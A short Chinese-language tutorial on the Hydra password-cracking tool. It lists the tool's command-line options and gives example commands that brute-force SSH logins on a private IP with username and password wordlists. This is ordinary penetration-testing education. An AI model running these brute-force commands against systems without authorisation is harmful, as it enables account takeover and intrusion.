hydra简介
hydra是一款开源的暴力密码破解工具,支持多种协议密码的破解。
hydra常用命令
这里我去除了字典生成部分,因为有专业的工具进行字典生成。而且hydra不适用于http(s)的破解,如果想进行http(s)的破解,请用
burpsuit进行破解。
-R 还原以前中止或崩溃的会话
-S 使用SSL连接
-s 指定非默认端口
-l 使用登录名进行登录
-L 使用账号字典进行破解
-p 使用密码进行登录
-P 使用密码字典进行破解
-e nsr n:空密码破解 s:使用的user作为密码破解 r:反向登录
-C 指定所用格式为"user:password"字典文件
-M 指定破解的目标文件,如果不是默认端口,后面跟上": port"
-o 将破解成功的用户名:密码写入指定文件
-b 指定文件类型(txt (default),json,jsonv1)
-f / -F 在找到用户名或密码时退出( -f 每个主机 -F 主机文件)
-t 设置每个目标并行连接数(默认为16)
-T 任务总体的并行连接数(默认为64)
-w /-W 设置超时时间(默认为32秒) 每个线程之间连接等待时间(默认为0)
-v / -V / -d 详细模式 / 显示login+pass 每个尝试 / 调试模式
-O 使用老版本SSL V2和V3
-q 不输出连接错误信息
-U 查看 支持破解的服务和协议
server 目标ip、某个网段
service 指定服务/协议名称
OPT 某些模块支持附加输入
hydra支持破解的服务/协议
实例演示-破解SSH密码
1.使用字典对目标服务进行破解。
hydra -L user.txt -P password.txt ssh://192.168.3.163
2.当目标服务开放的端口不是默认端口时,使用 -s 进行指定。
hydra -L user.txt -P password.txt ssh://192.168.3.163 -s 40
3.将破解的密码存储到指定文件。
hydra -L user.txt -P password.txt ssh://192.168.3.163 -s 40 -o ssh.txt
同理其他的服务破解也是如此,破解密码的成功关键在于字典的质量。
到此就完成了hydra的介绍,如果想了解更多Kali的工具,请关注我!
